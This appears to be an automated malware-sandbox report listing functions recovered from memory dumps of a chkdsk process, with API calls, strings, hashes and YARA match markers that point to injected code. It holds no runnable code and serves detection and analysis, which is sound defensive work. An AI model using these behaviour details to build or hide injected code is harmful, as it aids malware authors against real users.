Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45d37e68bb8c7071197eb5615ae565cd4175c6e616c2eec372761476a13b2dba
Instruction ID: 36718737fa6d9e5c97ed9877bde6a5a6017866fec9b20c64a4dee5ca90f85346
Opcode Fuzzy Hash: 45d37e68bb8c7071197eb5615ae565cd4175c6e616c2eec372761476a13b2dba
Instruction Fuzzy Hash: FC900222A0180912E1017158944861A001A8BD0241FD5C032A1024555ECA258A92A135

Function 05062EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062EEA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68da89c0feff5634bad2cd922bc3406fe1d0862e55b6f09e3f0a9391c98ee033
Instruction ID: 6c19c2945306ede1df229215c3977d3c0c4a5f8bd7e12aa153b2f0d550f90a8b
Opcode Fuzzy Hash: 68da89c0feff5634bad2cd922bc3406fe1d0862e55b6f09e3f0a9391c98ee033
Instruction Fuzzy Hash: B6900262601C0813E1407558984860B00158BD0302F95C021A2064555ECA298D516139

Function 050639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050639BA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf999710046efc10720f95b51d961b201905565de35cd45e85c26f14ad763800
Instruction ID: 6d6fd5be25d7325a7c8e4609d1bf7737a0f97060d928c5dd6f9811df139c1a0a
Opcode Fuzzy Hash: cf999710046efc10720f95b51d961b201905565de35cd45e85c26f14ad763800
Instruction Fuzzy Hash: CB90022264585512E150715C944861A4015ABE0201F95C031A0814594DC55589556235

Function 05062B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062B6A

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 667f695b58ded036d37369538b7533fc573aa59c3708a9c529c6d8df8a88ecdc
Instruction ID: 0926bd17324872a1ae710f1a8f668df389051931547f046e03aae0d10642f9a7
Opcode Fuzzy Hash: 667f695b58ded036d37369538b7533fc573aa59c3708a9c529c6d8df8a88ecdc
Instruction Fuzzy Hash: A59002626028041351057158945861A401A8BE0201B95C031E1014590DC52589916139

Function 05062BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062BAA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29ea7e1280936a2f13666b2c2cc2058e9070ce3674b1b611e30d10fa8c545f9f
Instruction ID: c61ec1d7e50396001928b515d846c26ee5136247ebf95de4b6701bf938b6a781
Opcode Fuzzy Hash: 29ea7e1280936a2f13666b2c2cc2058e9070ce3674b1b611e30d10fa8c545f9f
Instruction Fuzzy Hash: 5B900232A0580C12E1507158945874A00158BD0301F95C021A0024654DC7558B5576B5

Function 05062BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062BEA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b08aab86bc7485442e96eaefcfa2c00ce80f572c959fc2ebcddcf7e2b8f735f
Instruction ID: cec4aa47f9895b401447c30065a1699856e9fbe36c439c3248d3c228ef24784f
Opcode Fuzzy Hash: 2b08aab86bc7485442e96eaefcfa2c00ce80f572c959fc2ebcddcf7e2b8f735f
Instruction Fuzzy Hash: CA90023260584C52E14071589448A4A00258BD0305F95C021A0064694DD6258E55B675

Function 05062BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062BFA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e8b0077016871c7bdca0a3fc49d3f221b2ac0b8e6d50bd0874dc90039ad8002a
Instruction ID: 6645bc4c09242fdaef5287bb204d74e8f3e7bd13253beac92831cb32e7a0c6d3
Opcode Fuzzy Hash: e8b0077016871c7bdca0a3fc49d3f221b2ac0b8e6d50bd0874dc90039ad8002a
Instruction Fuzzy Hash: B190023260180C12E1807158944864E00158BD1301FD5C025A0025654DCA158B5977B5

Function 05062AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062ADA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3479f28a4e982283f359144b992a18477d2bc8d345231f33bf10e342a36521cc
Instruction ID: 57089ceec7b60e7eaa392ef0a3eae34a50e2add96c32807259b9bff465db66c3
Opcode Fuzzy Hash: 3479f28a4e982283f359144b992a18477d2bc8d345231f33bf10e342a36521cc
Instruction Fuzzy Hash: B8900437711C04131105F55C574C50F0057CFD53513D5C031F1015550CD731CD715135

Function 05062AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062AFA

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d06a9d5a767fdabf206c7acf854aec036018f890135d0d3a377bd32216ddbc2
Instruction ID: 273961c4696e527fa5e30929eea87285d1e7182ad207f68d5507ba95c99102c0
Opcode Fuzzy Hash: 9d06a9d5a767fdabf206c7acf854aec036018f890135d0d3a377bd32216ddbc2
Instruction Fuzzy Hash: A8900226621804121145B558564850F04559BD63513D5C025F1416590CC62189655335

Function 045701FF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 045702AD

Strings

2E85-1J297, xrefs: 045702A0, 045702AC, 045702BD
2E85-1J297, xrefs: 045702B4, 045702B7

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: 8366c3e659746a8dac493a5afed8c404fe4ac0674dbcabe8b58eb87a7d5ae38b
Instruction ID: 5366309ba74ab847d6a7e4e97ca83acb71c76758a624df03819eda5cbefeb6b5
Opcode Fuzzy Hash: 8366c3e659746a8dac493a5afed8c404fe4ac0674dbcabe8b58eb87a7d5ae38b
Instruction Fuzzy Hash: 13110A72D4021976E711AAA09C02FDF7B7C6B80B64F044265FE14BB1C0E674B60687E5

Function 0457022A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 045702AD

Strings

2E85-1J297, xrefs: 045702A0, 045702AC, 045702BD
2E85-1J297, xrefs: 045702B4, 045702B7

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: b3cf2f2cd3d052ceee1fa0655acd6795d3a0bfc5a631513f344845cdc1dc018d
Instruction ID: eaff514ed851988654b1c5be5b0f989b53eb499c08a77274bad65addcab57584
Opcode Fuzzy Hash: b3cf2f2cd3d052ceee1fa0655acd6795d3a0bfc5a631513f344845cdc1dc018d
Instruction Fuzzy Hash: 7A110472D4130976EB21AAA09C02FDF7B7CAF81B54F008065FA04BB1C0E674B6068BE5

Function 04570230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 045702AD

Strings

2E85-1J297, xrefs: 045702A0, 045702AC, 045702BD
2E85-1J297, xrefs: 045702B4, 045702B7

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: 5bca098ca5a42e758d7941ea9d447ea863c2c2e57a28911df31a0429b821d1ad
Instruction ID: b0e5f82585273ca556b068430745fe2badb24b7e2ef7f0cc6317a35cdf0b241d
Opcode Fuzzy Hash: 5bca098ca5a42e758d7941ea9d447ea863c2c2e57a28911df31a0429b821d1ad
Instruction Fuzzy Hash: 1401D672D4121976EB11ABA09C02FDF7B7CAF81B54F008065FA047B1C0E674760697E5

Function 045822C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 0458238B

Strings

wininet.dll, xrefs: 0458232B, 04582337
net.dll, xrefs: 04582354, 045823DA, 045823B2, 045823BE, 045823E6

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 49f60279d66e3d592e0455a7ac86439123b933a01cbc48738f980076be498bd5
Instruction ID: 935df6d4a8e4fc747bb4d15fdf5292c35c549706c1132a15a43767230f06e304
Opcode Fuzzy Hash: 49f60279d66e3d592e0455a7ac86439123b933a01cbc48738f980076be498bd5
Instruction Fuzzy Hash: BA31B2B1640705BBD714EF64D884FEBBBA8FB84304F00455DF95A6B240DB70B644DBA1

Function 0457E367 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0457E387

Strings

@J7<, xrefs: 0457E39B

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: ca6ed74a993edf241d3fcfec4592710884b783cec252579ca266abdb63b3c372
Instruction ID: f6caf651822d1a3a198f52585c059aa4cc6d6d5a9567d574dfcb3c5e0687a3f4
Opcode Fuzzy Hash: ca6ed74a993edf241d3fcfec4592710884b783cec252579ca266abdb63b3c372
Instruction Fuzzy Hash: 6E313FB5A0060AAFDB10DFD8D8809EFB7B9BF88304F108559E505EB214D771BA45DBA0

Function 0457E370 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0457E387

Strings

@J7<, xrefs: 0457E39B

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 894f1d20b5dc8d99fd1a8321d8d74573dcb407d250a6b2526296646418c4abd7
Instruction ID: 7ea0a6774f8df90386d1e1cc05a1b0be896f73d2a800941e60660eada9d0bf5a
Opcode Fuzzy Hash: 894f1d20b5dc8d99fd1a8321d8d74573dcb407d250a6b2526296646418c4abd7
Instruction Fuzzy Hash: 85311EB5A0060A9FDB10DFD8D8809EEB7B9FF88304F108559E916AB214D775BA05DBA0

Function 04573BE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 04573C52

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction ID: 0f535832d79933bd506e0e73898cb16c5ae06b030680b393735023680d3e9375
Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction Fuzzy Hash: DC0112B5D0010EA7DF10EBA4EC45F9DB778AF54208F0041A5ED18A7240FA35FB54DB51

Function 04587B00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,045774A3,00000010,?,?,?,00000044,?,00000010,045774A3,?,?,?), ref: 04587B60

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
Instruction ID: 571a6389a4054cf780cc26af438bca2ae1f44b2212375aa2309f8e7e1b8f3871
Opcode Fuzzy Hash: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
Instruction Fuzzy Hash: 200192B6204509BBDB44DE99DC80EEB77ADEF8D754F418108BA09E3240DA30F8518BA4

Function 04577530 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0457750C

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
Instruction ID: d246a16878875b6948c0c2341bbaa6ab945fd6de1ace2dd6a8456df4f1a5cad9
Opcode Fuzzy Hash: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
Instruction Fuzzy Hash: F5F08B61644685ABEF232338BC527E73B182F07315F3C0978F985DB4C3E624F01A9294

Function 045692C0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 04569305

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
Instruction ID: b77ef8bb37146167db4fea03070cd3edb0bd80959c3b86ee515a8f474a8576f6
Opcode Fuzzy Hash: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
Instruction Fuzzy Hash: 45F065733802043AE62075A99C02FD7779C9BC4B65F14042AF70DEB1C0D991B41152A4

Function 045692B8 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 04569305

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
Instruction ID: 740b7991a4fc09afaa67f65cb5ba6913adcf3aab1d585f3f9586fe0c84d48c12
Opcode Fuzzy Hash: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
Instruction Fuzzy Hash: 9FF09B723806443AF73066A89C03FDB779C9FC5B55F24051DF70AFB1C1C992745256A4

Function 04587A70 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,045734C3,000000F4,?,?,?,?,?), ref: 04587AAF

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction ID: f097411ac1fd4b7aba0e43b4cec17c09c2d7eebb8091310065095c587631b37b
Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction Fuzzy Hash: 10E065722002047FE614EE59DC44FAB37ADEFC9B14F004408FA09E7241DA70B8108BB5

Function 04587A20 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04570E49,?,04584209,04570E49,04583DC7,04584209,?,04570E49,04583DC7,00001000,?,?,045892F3), ref: 04587A5F

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction ID: 9eb5aba8f626b59dfe029bee7ab1f6497838300d1fb15b86f2a9be4f90b88405
Opcode Fuzzy Hash: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction Fuzzy Hash: FBE039712006047BD610EE59EC40FAB37ADEBC4714F008409B908A7241CA31B9108BB4

Function 045774E0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0457750C

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
Instruction ID: 3b408627dc105493467b7888cf44b2f43188b2eb1013488077f395d74ed5044c
Opcode Fuzzy Hash: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
Instruction Fuzzy Hash: 7EE086712502082BFB246BA8FC45F6633589B4CB25F694A70F91DDB2C2F578F5019150

Function 045772E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,04571130,045864E7,04583DC7,?), ref: 04577323

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
Instruction ID: 6211efe94888bacb725e3ef00012c58e5ab4d28dd5ab4300dd076afee28e0c94
Opcode Fuzzy Hash: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
Instruction Fuzzy Hash: D7E086717802453EF710E7B4AC42FB52F55AB84304F0540BDB848E72C3D851B1119660

Function 045772F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,04571130,045864E7,04583DC7,?), ref: 04577323

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
Instruction ID: 4d586acc1f49dfafeeffa5c29c3a6b7d989c76328183c530a093966b7ca3d692
Opcode Fuzzy Hash: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
Instruction Fuzzy Hash: ADD05EB17802093BFA00F7A4EC42F66368CAB84658F458079B908E76C2E965F11055A5

Function 05062C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05062C24

Memory Dump Source

Source File: 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: true

Associated: 0000000C.00000002.4145392650.0000000005119000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000511D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4ff0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e872d634ebc4d20ce464c122afeaacf5ddbb7f560ddd4e7357b5b1e32fc7fbb6
Instruction ID: d4e92119ee5e43ecaf028b8ee8487d2f54ad37f70c7c33236778b562c80556a0
Opcode Fuzzy Hash: e872d634ebc4d20ce464c122afeaacf5ddbb7f560ddd4e7357b5b1e32fc7fbb6
Instruction Fuzzy Hash: 6AB09B72D019C5D9EA51E760560CB1F79517BD0711F55C071D2030641F4738C1D1E175

Non-executed Functions

Function 0456D8A9 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a2ec7e5fc312fdcb41c5cc392c93e7be150bd3f984315b2bb1805f0797c7fd
Instruction ID: e606acae039b21ee761fd03c782cb7e36312d4ca1eeec3957f4600092f751937
Opcode Fuzzy Hash: 26a2ec7e5fc312fdcb41c5cc392c93e7be150bd3f984315b2bb1805f0797c7fd
Instruction Fuzzy Hash: F7C08C23A2720002E926580DB4903F6EB68E793132D8866ABDC8BBB202C182D45102DE

Function 04571B46 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Offset: 04560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4560000_chkdsk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04573d4c8e71e8cb0a1e5831db538decda73121080bccb100388de987c756d2
Instruction ID: de9dbf575066db9d4e445d591fd9d23a1e3af454c317aaa6cfe53130fd53da5c
Opcode Fuzzy Hash: b04573d4c8e71e8cb0a1e5831db538decda73121080bccb100388de987c756d2
Instruction Fuzzy Hash: B6B09213B042480161286C8A78800B8F7A0D6C3232E5823BAEA4CA30404043C914429C

Function 05062890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0506293C
___swprintf_l.LIBCMT ref: 0506295E
___swprintf_l.LIBCMT ref: 050629A3
